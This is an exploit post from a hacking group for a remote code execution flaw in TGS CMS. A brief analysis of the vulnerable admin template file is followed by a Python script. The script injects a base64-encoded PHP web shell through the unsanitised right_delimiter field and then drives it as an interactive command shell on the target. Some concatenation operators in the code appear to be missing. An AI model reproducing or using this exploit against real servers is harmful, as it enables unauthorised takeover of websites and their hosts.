# TGS CMS Remote Code Execution Exploit

# by 0in

# from Dark-Coders Group!

# www.dark-coders.pl

# Contact: 0in(dot)email[at]gmail(dot)com

# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke

# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot

# Let's analyze the vuln:

# We've got the: /cms/admin/admin.template_engine.php

# first line:"<?"

# next 2-22 lines - comments

# 23: if ($_GET['option'] == "set_template") {

# 24: $filename = "../index.php";

# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {

# From 50 line to 88 we have definition of file content

# 50: $content = '<?php // here programmer define the file to save in "../index.php"

# but...

# he.. don't think xD

# 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";

# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";

# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";

# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";

# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";

# And.. boom!

# 89: if (@fwrite($handle,$content)) {

# Just simply exploit for fun:

import httplib

import urllib

print "TGS CMS Remote Code Execution Exploit"

print "by 0in From Dark-Coders Group"

print "www.dark-coders.pl"

print 'Enter target:'

target=raw_input()

print 'Enter path:'

path=raw_input()

inject="";error_reporting(0);eval(base64_decode("JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7"));//"

exploit=httplib.HTTPConnection(target ':80')

headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}

data=urllib.urlencode({'right_delimiter':inject})

exploit.request("POST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)

print exploit.getresponse().read()

while(1):

cmd=raw_input("[shell@" target "]#")

if(cmd=='exit'):

quit()

shell=httplib.HTTPConnection(target ':80')

shell.request("GET",path "/cms/index.php?zuo=" cmd)

print shell.getresponse().read()